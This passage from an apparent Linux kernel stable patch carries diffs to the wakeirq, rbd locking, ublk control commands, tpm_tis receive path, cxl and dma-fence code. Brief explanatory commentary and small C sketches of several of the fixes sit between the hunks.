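In the perflib hunks, a _PPC value of 0 now maps to FREQ_QOS_MAX_DEFAULT_VALUE ("no limit") rather than the frequency of state 0, and the QoS request is only updated when the limit actually changes. A sketch of the mapping (hypothetical helper; the kernel defines FREQ_QOS_MAX_DEFAULT_VALUE as S32_MAX):

#include <limits.h>

#define FREQ_QOS_MAX_DEFAULT_VALUE INT_MAX	/* S32_MAX in the kernel */

struct pss_state { unsigned long core_frequency; };	/* MHz, as in _PSS */

static long ppc_to_qos_khz(int index, const struct pss_state *states)
{
	if (index == 0)			/* _PPC 0: every state is usable */
		return FREQ_QOS_MAX_DEFAULT_VALUE;
	return (long)states[index].core_frequency * 1000;	/* MHz -> kHz */
}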
+diff --git a/drivers/ata/pata_ns87415.c b/drivers/ata/pata_ns87415.c
+index 9dd6bffefb485..602472d4e693e 100644
+--- a/drivers/ata/pata_ns87415.c
++++ b/drivers/ata/pata_ns87415.c
+@@ -260,7 +260,7 @@ static u8 ns87560_check_status(struct ata_port *ap)
+  *	LOCKING:
+  *	Inherited from caller.
+  */
+-void ns87560_tf_read(struct ata_port *ap, struct ata_taskfile *tf)
++static void ns87560_tf_read(struct ata_port *ap, struct ata_taskfile *tf)
+ {
+ 	struct ata_ioports *ioaddr = &ap->ioaddr;
+ 
+diff --git a/drivers/base/power/power.h b/drivers/base/power/power.h
+index 0eb7f02b3ad59..922ed457db191 100644
+--- a/drivers/base/power/power.h
++++ b/drivers/base/power/power.h
+@@ -29,6 +29,7 @@ extern u64 pm_runtime_active_time(struct device *dev);
+ #define WAKE_IRQ_DEDICATED_MASK		(WAKE_IRQ_DEDICATED_ALLOCATED | \
+ 					 WAKE_IRQ_DEDICATED_MANAGED | \
+ 					 WAKE_IRQ_DEDICATED_REVERSE)
++#define WAKE_IRQ_DEDICATED_ENABLED	BIT(3)
+ 
+ struct wake_irq {
+ 	struct device *dev;
+diff --git a/drivers/base/power/wakeirq.c b/drivers/base/power/wakeirq.c
+index d487a6bac630f..afd094dec5ca3 100644
+--- a/drivers/base/power/wakeirq.c
++++ b/drivers/base/power/wakeirq.c
+@@ -314,8 +314,10 @@ void dev_pm_enable_wake_irq_check(struct device *dev,
+ 	return;
+ 
+ enable:
+-	if (!can_change_status || !(wirq->status & WAKE_IRQ_DEDICATED_REVERSE))
++	if (!can_change_status || !(wirq->status & WAKE_IRQ_DEDICATED_REVERSE)) {
+ 		enable_irq(wirq->irq);
++		wirq->status |= WAKE_IRQ_DEDICATED_ENABLED;
++	}
+ }
+ 
+ /**
+@@ -336,8 +338,10 @@ void dev_pm_disable_wake_irq_check(struct device *dev, bool cond_disable)
+ 	if (cond_disable && (wirq->status & WAKE_IRQ_DEDICATED_REVERSE))
+ 		return;
+ 
+-	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED)
++	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED) {
++		wirq->status &= ~WAKE_IRQ_DEDICATED_ENABLED;
+ 		disable_irq_nosync(wirq->irq);
++	}
+ }
+ 
+ /**
+@@ -376,7 +380,7 @@ void dev_pm_arm_wake_irq(struct wake_irq *wirq)
+ 
+ 	if (device_may_wakeup(wirq->dev)) {
+ 		if (wirq->status & WAKE_IRQ_DEDICATED_ALLOCATED &&
+-		    !pm_runtime_status_suspended(wirq->dev))
++		    !(wirq->status & WAKE_IRQ_DEDICATED_ENABLED))
+ 			enable_irq(wirq->irq);
+ 
+ 		enable_irq_wake(wirq->irq);
+@@ -399,7 +403,7 @@ void dev_pm_disarm_wake_irq(struct wake_irq *wirq)
+ 		disable_irq_wake(wirq->irq);
+ 
+ 		if (wirq->status & WAKE_IRQ_DEDICATED_ALLOCATED &&
+-		    !pm_runtime_status_suspended(wirq->dev))
++		    !(wirq->status & WAKE_IRQ_DEDICATED_ENABLED))
+ 			disable_irq_nosync(wirq->irq);
+ 	}
+ }
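The wakeirq hunks stop inferring the dedicated IRQ's state from pm_runtime_status_suspended() and instead track it explicitly with a WAKE_IRQ_DEDICATED_ENABLED status bit, keeping enable_irq()/disable_irq_nosync() calls strictly paired. The pattern in isolation (a sketch; the real kernel calls are left as comments):

#define WAKE_IRQ_ENABLED	(1U << 3)	/* mirrors WAKE_IRQ_DEDICATED_ENABLED */

struct wirq_demo {
	unsigned int status;
	int irq;
};

static void wirq_enable(struct wirq_demo *w)
{
	if (!(w->status & WAKE_IRQ_ENABLED)) {
		/* enable_irq(w->irq); */
		w->status |= WAKE_IRQ_ENABLED;
	}
}

static void wirq_disable(struct wirq_demo *w)
{
	if (w->status & WAKE_IRQ_ENABLED) {
		w->status &= ~WAKE_IRQ_ENABLED;
		/* disable_irq_nosync(w->irq); */
	}
}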
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index e009f480675d2..daec0321cd76b 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3850,51 +3850,82 @@ static void wake_lock_waiters(struct rbd_device *rbd_dev, int result)
+ 	list_splice_tail_init(&rbd_dev->acquiring_list, &rbd_dev->running_list);
+ }
+ 
+-static int get_lock_owner_info(struct rbd_device *rbd_dev,
+-			       struct ceph_locker **lockers, u32 *num_lockers)
++static bool locker_equal(const struct ceph_locker *lhs,
++			 const struct ceph_locker *rhs)
++{
++	return lhs->id.name.type == rhs->id.name.type &&
++	       lhs->id.name.num == rhs->id.name.num &&
++	       !strcmp(lhs->id.cookie, rhs->id.cookie) &&
++	       ceph_addr_equal_no_type(&lhs->info.addr, &rhs->info.addr);
++}
++
++static void free_locker(struct ceph_locker *locker)
++{
++	if (locker)
++		ceph_free_lockers(locker, 1);
++}
++
++static struct ceph_locker *get_lock_owner_info(struct rbd_device *rbd_dev)
+ {
+ 	struct ceph_osd_client *osdc = &rbd_dev->rbd_client->client->osdc;
++	struct ceph_locker *lockers;
++	u32 num_lockers;
+ 	u8 lock_type;
+ 	char *lock_tag;
++	u64 handle;
+ 	int ret;
+ 
+-	dout("%s rbd_dev %p\n", __func__, rbd_dev);
+-
+ 	ret = ceph_cls_lock_info(osdc, &rbd_dev->header_oid,
+ 				 &rbd_dev->header_oloc, RBD_LOCK_NAME,
+-				 &lock_type, &lock_tag, lockers, num_lockers);
+-	if (ret)
+-		return ret;
++				 &lock_type, &lock_tag, &lockers, &num_lockers);
++	if (ret) {
++		rbd_warn(rbd_dev, "failed to retrieve lockers: %d", ret);
++		return ERR_PTR(ret);
++	}
+ 
+-	if (*num_lockers == 0) {
++	if (num_lockers == 0) {
+ 		dout("%s rbd_dev %p no lockers detected\n", __func__, rbd_dev);
++		lockers = NULL;
+ 		goto out;
+ 	}
+ 
+ 	if (strcmp(lock_tag, RBD_LOCK_TAG)) {
+ 		rbd_warn(rbd_dev, "locked by external mechanism, tag %s",
+ 			 lock_tag);
+-		ret = -EBUSY;
+-		goto out;
++		goto err_busy;
+ 	}
+ 
+-	if (lock_type == CEPH_CLS_LOCK_SHARED) {
+-		rbd_warn(rbd_dev, "shared lock type detected");
+-		ret = -EBUSY;
+-		goto out;
++	if (lock_type != CEPH_CLS_LOCK_EXCLUSIVE) {
++		rbd_warn(rbd_dev, "incompatible lock type detected");
++		goto err_busy;
+ 	}
+ 
+-	if (strncmp((*lockers)[0].id.cookie, RBD_LOCK_COOKIE_PREFIX,
+-		    strlen(RBD_LOCK_COOKIE_PREFIX))) {
++	WARN_ON(num_lockers != 1);
++	ret = sscanf(lockers[0].id.cookie, RBD_LOCK_COOKIE_PREFIX " %llu",
++		     &handle);
++	if (ret != 1) {
+ 		rbd_warn(rbd_dev, "locked by external mechanism, cookie %s",
+-			 (*lockers)[0].id.cookie);
+-		ret = -EBUSY;
+-		goto out;
++			 lockers[0].id.cookie);
++		goto err_busy;
+ 	}
++	if (ceph_addr_is_blank(&lockers[0].info.addr)) {
++		rbd_warn(rbd_dev, "locker has a blank address");
++		goto err_busy;
++	}
++
++	dout("%s rbd_dev %p got locker %s%llu@%pISpc/%u handle %llu\n",
++	     __func__, rbd_dev, ENTITY_NAME(lockers[0].id.name),
++	     &lockers[0].info.addr.in_addr,
++	     le32_to_cpu(lockers[0].info.addr.nonce), handle);
+ 
+ out:
+ 	kfree(lock_tag);
+-	return ret;
++	return lockers;
++
++err_busy:
++	kfree(lock_tag);
++	ceph_free_lockers(lockers, num_lockers);
++	return ERR_PTR(-EBUSY);
+ }
+ 
+ static int find_watcher(struct rbd_device *rbd_dev,
+@@ -3948,51 +3979,68 @@ out:
+ static int rbd_try_lock(struct rbd_device *rbd_dev)
+ {
+ 	struct ceph_client *client = rbd_dev->rbd_client->client;
+-	struct ceph_locker *lockers;
+-	u32 num_lockers;
++	struct ceph_locker *locker, *refreshed_locker;
+ 	int ret;
+ 
+ 	for (;;) {
++		locker = refreshed_locker = NULL;
++
+ 		ret = rbd_lock(rbd_dev);
+ 		if (ret != -EBUSY)
+-			return ret;
++			goto out;
+ 
+ 		/* determine if the current lock holder is still alive */
+-		ret = get_lock_owner_info(rbd_dev, &lockers, &num_lockers);
+-		if (ret)
+-			return ret;
+-
+-		if (num_lockers == 0)
++		locker = get_lock_owner_info(rbd_dev);
++		if (IS_ERR(locker)) {
++			ret = PTR_ERR(locker);
++			locker = NULL;
++			goto out;
++		}
++		if (!locker)
+ 			goto again;
+ 
+-		ret = find_watcher(rbd_dev, lockers);
++		ret = find_watcher(rbd_dev, locker);
+ 		if (ret)
+ 			goto out; /* request lock or error */
+ 
++		refreshed_locker = get_lock_owner_info(rbd_dev);
++		if (IS_ERR(refreshed_locker)) {
++			ret = PTR_ERR(refreshed_locker);
++			refreshed_locker = NULL;
++			goto out;
++		}
++		if (!refreshed_locker ||
++		    !locker_equal(locker, refreshed_locker))
++			goto again;
++
+ 		rbd_warn(rbd_dev, "breaking header lock owned by %s%llu",
+-			 ENTITY_NAME(lockers[0].id.name));
++			 ENTITY_NAME(locker->id.name));
+ 
+ 		ret = ceph_monc_blocklist_add(&client->monc,
+-					      &lockers[0].info.addr);
++					      &locker->info.addr);
+ 		if (ret) {
+-			rbd_warn(rbd_dev, "blocklist of %s%llu failed: %d",
+-				 ENTITY_NAME(lockers[0].id.name), ret);
++			rbd_warn(rbd_dev, "failed to blocklist %s%llu: %d",
++				 ENTITY_NAME(locker->id.name), ret);
+ 			goto out;
+ 		}
+ 
+ 		ret = ceph_cls_break_lock(&client->osdc, &rbd_dev->header_oid,
+ 					  &rbd_dev->header_oloc, RBD_LOCK_NAME,
+-					  lockers[0].id.cookie,
+-					  &lockers[0].id.name);
+-		if (ret && ret != -ENOENT)
++					  locker->id.cookie, &locker->id.name);
++		if (ret && ret != -ENOENT) {
++			rbd_warn(rbd_dev, "failed to break header lock: %d",
++				 ret);
+ 			goto out;
++		}
+ 
+ again:
+-		ceph_free_lockers(lockers, num_lockers);
++		free_locker(refreshed_locker);
++		free_locker(locker);
+ 	}
+ 
+ out:
+-	ceph_free_lockers(lockers, num_lockers);
++	free_locker(refreshed_locker);
++	free_locker(locker);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c56d1c6d8e58d..4459cfbdbcb18 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1529,22 +1529,18 @@ static struct ublk_device *ublk_get_device_from_id(int idx)
+ 	return ub;
+ }
+ 
+-static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
++static int ublk_ctrl_start_dev(struct ublk_device *ub, struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ublksrv_pid = (int)header->data[0];
+-	struct ublk_device *ub;
+ 	struct gendisk *disk;
+ 	int ret = -EINVAL;
+ 
+ 	if (ublksrv_pid <= 0)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+-	wait_for_completion_interruptible(&ub->completion);
++	if (wait_for_completion_interruptible(&ub->completion) != 0)
++		return -EINTR;
+ 
+ 	schedule_delayed_work(&ub->monitor_work, UBLK_DAEMON_MONITOR_PERIOD);
+ 
+@@ -1593,21 +1589,20 @@ out_put_disk:
+ 		put_disk(disk);
+ out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_queue_affinity(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+-	struct ublk_device *ub;
+ 	cpumask_var_t cpumask;
+ 	unsigned long queue;
+ 	unsigned int retlen;
+ 	unsigned int i;
+-	int ret = -EINVAL;
+-	
++	int ret;
++
+ 	if (header->len * BITS_PER_BYTE < nr_cpu_ids)
+ 		return -EINVAL;
+ 	if (header->len & (sizeof(unsigned long)-1))
+@@ -1615,17 +1610,12 @@ static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
+ 	if (!header->addr)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	queue = header->data[0];
+ 	if (queue >= ub->dev_info.nr_hw_queues)
+-		goto out_put_device;
++		return -EINVAL;
+ 
+-	ret = -ENOMEM;
+ 	if (!zalloc_cpumask_var(&cpumask, GFP_KERNEL))
+-		goto out_put_device;
++		return -ENOMEM;
+ 
+ 	for_each_possible_cpu(i) {
+ 		if (ub->tag_set.map[HCTX_TYPE_DEFAULT].mq_map[i] == queue)
+@@ -1643,8 +1633,6 @@ static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
+ 	ret = 0;
+ out_free_cpumask:
+ 	free_cpumask_var(cpumask);
+-out_put_device:
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+@@ -1765,30 +1753,27 @@ static inline bool ublk_idr_freed(int id)
+ 	return ptr == NULL;
+ }
+ 
+-static int ublk_ctrl_del_dev(int idx)
++static int ublk_ctrl_del_dev(struct ublk_device **p_ub)
+ {
+-	struct ublk_device *ub;
++	struct ublk_device *ub = *p_ub;
++	int idx = ub->ub_number;
+ 	int ret;
+ 
+ 	ret = mutex_lock_killable(&ublk_ctl_mutex);
+ 	if (ret)
+ 		return ret;
+ 
+-	ub = ublk_get_device_from_id(idx);
+-	if (ub) {
+-		ublk_remove(ub);
+-		ublk_put_device(ub);
+-		ret = 0;
+-	} else {
+-		ret = -ENODEV;
+-	}
++	ublk_remove(ub);
++
++	/* Mark the reference as consumed */
++	*p_ub = NULL;
++	ublk_put_device(ub);
+ 
+ 	/*
+ 	 * Wait until the idr is removed, then it can be reused after
+ 	 * DEL_DEV command is returned.
+ 	 */
+-	if (!ret)
+-		wait_event(ublk_idr_wq, ublk_idr_freed(idx));
++	wait_event(ublk_idr_wq, ublk_idr_freed(idx));
+ 	mutex_unlock(&ublk_ctl_mutex);
+ 
+ 	return ret;
+@@ -1803,50 +1788,36 @@ static inline void ublk_ctrl_cmd_dump(struct io_uring_cmd *cmd)
+ 			header->data[0], header->addr, header->len);
+ }
+ 
+-static int ublk_ctrl_stop_dev(struct io_uring_cmd *cmd)
++static int ublk_ctrl_stop_dev(struct ublk_device *ub)
+ {
+-	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+-	struct ublk_device *ub;
+-
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	ublk_stop_dev(ub);
+ 	cancel_work_sync(&ub->stop_work);
+ 	cancel_work_sync(&ub->quiesce_work);
+ 
+-	ublk_put_device(ub);
+ 	return 0;
+ }
+ 
+-static int ublk_ctrl_get_dev_info(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_dev_info(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+-	struct ublk_device *ub;
+-	int ret = 0;
+ 
+ 	if (header->len < sizeof(struct ublksrv_ctrl_dev_info) || !header->addr)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	if (copy_to_user(argp, &ub->dev_info, sizeof(ub->dev_info)))
+-		ret = -EFAULT;
+-	ublk_put_device(ub);
++		return -EFAULT;
+ 
+-	return ret;
++	return 0;
+ }
+ 
+-static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_params(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+ 	struct ublk_params_header ph;
+-	struct ublk_device *ub;
+ 	int ret;
+ 
+ 	if (header->len <= sizeof(ph) || !header->addr)
+@@ -1861,10 +1832,6 @@ static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
+ 	if (ph.len > sizeof(struct ublk_params))
+ 		ph.len = sizeof(struct ublk_params);
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	mutex_lock(&ub->mutex);
+ 	if (copy_to_user(argp, &ub->params, ph.len))
+ 		ret = -EFAULT;
+@@ -1872,16 +1839,15 @@ static int ublk_ctrl_get_params(struct io_uring_cmd *cmd)
+ 		ret = 0;
+ 	mutex_unlock(&ub->mutex);
+ 
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
++static int ublk_ctrl_set_params(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+ 	struct ublk_params_header ph;
+-	struct ublk_device *ub;
+ 	int ret = -EFAULT;
+ 
+ 	if (header->len <= sizeof(ph) || !header->addr)
+@@ -1896,10 +1862,6 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 	if (ph.len > sizeof(struct ublk_params))
+ 		ph.len = sizeof(struct ublk_params);
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+ 	/* parameters can only be changed when device isn't live */
+ 	mutex_lock(&ub->mutex);
+ 	if (ub->dev_info.state == UBLK_S_DEV_LIVE) {
+@@ -1914,7 +1876,6 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 
+ 	return ret;
+ }
+@@ -1941,17 +1902,13 @@ static void ublk_queue_reinit(struct ublk_device *ub, struct ublk_queue *ubq)
+ 	}
+ }
+ 
+-static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
++static int ublk_ctrl_start_recovery(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+-	struct ublk_device *ub;
+ 	int ret = -EINVAL;
+ 	int i;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return ret;
+-
+ 	mutex_lock(&ub->mutex);
+ 	if (!ublk_can_use_recovery(ub))
+ 		goto out_unlock;
+@@ -1984,25 +1941,22 @@ static int ublk_ctrl_start_recovery(struct io_uring_cmd *cmd)
+ 	ret = 0;
+  out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_end_recovery(struct io_uring_cmd *cmd)
++static int ublk_ctrl_end_recovery(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ublksrv_pid = (int)header->data[0];
+-	struct ublk_device *ub;
+ 	int ret = -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return ret;
+-
+ 	pr_devel("%s: Waiting for new ubq_daemons(nr: %d) are ready, dev id %d...\n",
+ 			__func__, ub->dev_info.nr_hw_queues, header->dev_id);
+ 	/* wait until new ubq_daemon sending all FETCH_REQ */
+-	wait_for_completion_interruptible(&ub->completion);
++	if (wait_for_completion_interruptible(&ub->completion))
++		return -EINTR;
++
+ 	pr_devel("%s: All new ubq_daemons(nr: %d) are ready, dev id %d\n",
+ 			__func__, ub->dev_info.nr_hw_queues, header->dev_id);
+ 
+@@ -2026,7 +1980,6 @@ static int ublk_ctrl_end_recovery(struct io_uring_cmd *cmd)
+ 	ret = 0;
+  out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+@@ -2034,6 +1987,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		unsigned int issue_flags)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
++	struct ublk_device *ub = NULL;
+ 	int ret = -EINVAL;
+ 
+ 	if (issue_flags & IO_URING_F_NONBLOCK)
+@@ -2048,41 +2002,50 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		goto out;
+ 
+-	ret = -ENODEV;
++	if (cmd->cmd_op != UBLK_CMD_ADD_DEV) {
++		ret = -ENODEV;
++		ub = ublk_get_device_from_id(header->dev_id);
++		if (!ub)
++			goto out;
++	}
++
+ 	switch (cmd->cmd_op) {
+ 	case UBLK_CMD_START_DEV:
+-		ret = ublk_ctrl_start_dev(cmd);
++		ret = ublk_ctrl_start_dev(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_STOP_DEV:
+-		ret = ublk_ctrl_stop_dev(cmd);
++		ret = ublk_ctrl_stop_dev(ub);
+ 		break;
+ 	case UBLK_CMD_GET_DEV_INFO:
+-		ret = ublk_ctrl_get_dev_info(cmd);
++		ret = ublk_ctrl_get_dev_info(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_ADD_DEV:
+ 		ret = ublk_ctrl_add_dev(cmd);
+ 		break;
+ 	case UBLK_CMD_DEL_DEV:
+-		ret = ublk_ctrl_del_dev(header->dev_id);
++		ret = ublk_ctrl_del_dev(&ub);
+ 		break;
+ 	case UBLK_CMD_GET_QUEUE_AFFINITY:
+-		ret = ublk_ctrl_get_queue_affinity(cmd);
++		ret = ublk_ctrl_get_queue_affinity(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_GET_PARAMS:
+-		ret = ublk_ctrl_get_params(cmd);
++		ret = ublk_ctrl_get_params(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_SET_PARAMS:
+-		ret = ublk_ctrl_set_params(cmd);
++		ret = ublk_ctrl_set_params(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_START_USER_RECOVERY:
+-		ret = ublk_ctrl_start_recovery(cmd);
++		ret = ublk_ctrl_start_recovery(ub, cmd);
+ 		break;
+ 	case UBLK_CMD_END_USER_RECOVERY:
+-		ret = ublk_ctrl_end_recovery(cmd);
++		ret = ublk_ctrl_end_recovery(ub, cmd);
+ 		break;
+ 	default:
++		ret = -ENOTSUPP;
+ 		break;
+ 	}
++	if (ub)
++		ublk_put_device(ub);
+  out:
+ 	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 55f6ff1e05aa5..44f71f2c8cfa0 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -356,8 +356,13 @@ static int tpm_tis_recv(struct tpm_chip *chip, u8 *buf, size_t count)
+ 		goto out;
+ 	}
+ 
+-	size += recv_data(chip, &buf[TPM_HEADER_SIZE],
+-			  expected - TPM_HEADER_SIZE);
++	rc = recv_data(chip, &buf[TPM_HEADER_SIZE],
++		       expected - TPM_HEADER_SIZE);
++	if (rc < 0) {
++		size = rc;
++		goto out;
++	}
++	size += rc;
+ 	if (size < expected) {
+ 		dev_err(&chip->dev, "Unable to read remainder of result\n");
+ 		size = -ETIME;
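The tpm_tis hunk fixes silent error loss: recv_data() can return a negative errno, and adding that directly into a running byte count both hides the failure and corrupts the total. A sketch of the check-then-accumulate pattern (read_chunk is a hypothetical helper standing in for recv_data):

#include <sys/types.h>

extern ssize_t read_chunk(char *buf, size_t n);	/* may return -errno */

static ssize_t read_all(char *buf, size_t header, size_t expected)
{
	ssize_t size = (ssize_t)header;		/* bytes already consumed */
	ssize_t rc;

	rc = read_chunk(buf + header, expected - header);
	if (rc < 0)
		return rc;	/* propagate; never fold into the count */
	size += rc;
	return size;
}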
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 818eb2503cdd5..d51f90f55c05c 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -451,20 +451,6 @@ static void intel_pstate_init_acpi_perf_limits(struct cpufreq_policy *policy)
+ 			 (u32) cpu->acpi_perf_data.states[i].control);
+ 	}
+ 
+-	/*
+-	 * The _PSS table doesn't contain whole turbo frequency range.
+-	 * This just contains +1 MHZ above the max non turbo frequency,
+-	 * with control value corresponding to max turbo ratio. But
+-	 * when cpufreq set policy is called, it will call with this
+-	 * max frequency, which will cause a reduced performance as
+-	 * this driver uses real max turbo frequency as the max
+-	 * frequency. So correct this frequency in _PSS table to
+-	 * correct max turbo frequency based on the turbo state.
+-	 * Also need to convert to MHz as _PSS freq is in MHz.
+-	 */
+-	if (!global.turbo_disabled)
+-		cpu->acpi_perf_data.states[0].core_frequency =
+-					policy->cpuinfo.max_freq / 1000;
+ 	cpu->valid_pss_table = true;
+ 	pr_debug("_PPC limits will be enforced\n");
+ 
+diff --git a/drivers/cxl/acpi.c b/drivers/cxl/acpi.c
+index fb649683dd3ac..07b184382707e 100644
+--- a/drivers/cxl/acpi.c
++++ b/drivers/cxl/acpi.c
+@@ -154,9 +154,8 @@ static int cxl_parse_cfmws(union acpi_subtable_headers *header, void *arg,
+ 	else
+ 		rc = cxl_decoder_autoremove(dev, cxld);
+ 	if (rc) {
+-		dev_err(dev, "Failed to add decode range [%#llx - %#llx]\n",
+-			cxld->hpa_range.start, cxld->hpa_range.end);
+-		return 0;
++		dev_err(dev, "Failed to add decode range: %pr", res);
++		return rc;
+ 	}
+ 	dev_dbg(dev, "add: %s node: %d range [%#llx - %#llx]\n",
+ 		dev_name(&cxld->dev),
+diff --git a/drivers/dma-buf/dma-fence-unwrap.c b/drivers/dma-buf/dma-fence-unwrap.c
+index 7002bca792ff0..c625bb2b5d563 100644
+--- a/drivers/dma-buf/dma-fence-unwrap.c
++++ b/drivers/dma-buf/dma-fence-unwrap.c
+@@ -66,18 +66,36 @@ struct dma_fence *__dma_fence_unwrap_merge(unsigned int num_fences,
+ {
+ 	struct dma_fence_array *result;
+ 	struct dma_fence *tmp, **array;
++	ktime_t timestamp;
+ 	unsigned int i;
+ 	size_t count;
+ 
+ 	count = 0;
++	timestamp = ns_to_ktime(0);
+ 	for (i = 0; i < num_fences; ++i) {
+-		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i])
+-			if (!dma_fence_is_signaled(tmp))
++		dma_fence_unwrap_for_each(tmp, &iter[i], fences[i]) {
++			if (!dma_fence_is_signaled(tmp)) {
+ 				++count;
++			} else if (test_bit(DMA_FENCE_FLAG_TIMESTAMP_BIT,
++					    &tmp->flags)) {
++				if (ktime_after(tmp->timestamp, timestamp))
++					timestamp = tmp->timestamp;
++			} else {
++				/*
++				 * Use the current time if the fence is
++				 * currently signaling.
++				 */
++				timestamp = ktime_get();
++			}
++		}
+ 	}
+ 
++	/*
++	 * If we couldn't find a pending fence just return a private signaled
++	 * fence with the timestamp of the last signaled one.
++	 */
+ 	if (count == 0)
+-		return dma_fence_get_stub();
++		return dma_fence_allocate_private_stub(timestamp);
+ 
+ 	array = kmalloc_array(count, sizeof(*array), GFP_KERNEL);
+ 	if (!array)
+@@ -138,7 +156,7 @@ restart:
+ 	} while (tmp);
+ 
+ 	if (count == 0) {
+-		tmp = dma_fence_get_stub();
++		tmp = dma_fence_allocate_private_stub(ktime_get());
+ 		goto return_tmp;
+ 	}
+ 
+diff --git a/drivers/dma-buf/dma-fence.c b/drivers/dma-buf/dma-fence.c
+index 0de0482cd36e2..eef4786aaf862 100644
+--- a/drivers/dma-buf/dma-fence.c
++++ b/drivers/dma-buf/dma-fence.c
+@@ -150,16 +150,17 @@ EXPORT_SYMBOL(dma_fence_get_stub);
+ 
+ /**
+  * dma_fence_allocate_private_stub - return a private, signaled fence
++ * @timestamp: timestamp when the fence was signaled
+  *
+  * Return a newly allocated and signaled stub fence.
+  */
+-struct dma_fence *dma_fence_allocate_private_stub(void)
++struct dma_fence *dma_fence_allocate_private_stub(ktime_t timestamp)
+ {
+ 	struct dma_fence *fence;
+ 
+ 	fence = kzalloc(sizeof(*fence), GFP_KERNEL);
+ 	if (fence == NULL)
+-		return ERR_PTR(-ENOMEM);
++		return NULL;
+ 
+ 	dma_fence_init(fence,
+ 		       &dma_fence_stub_ops,
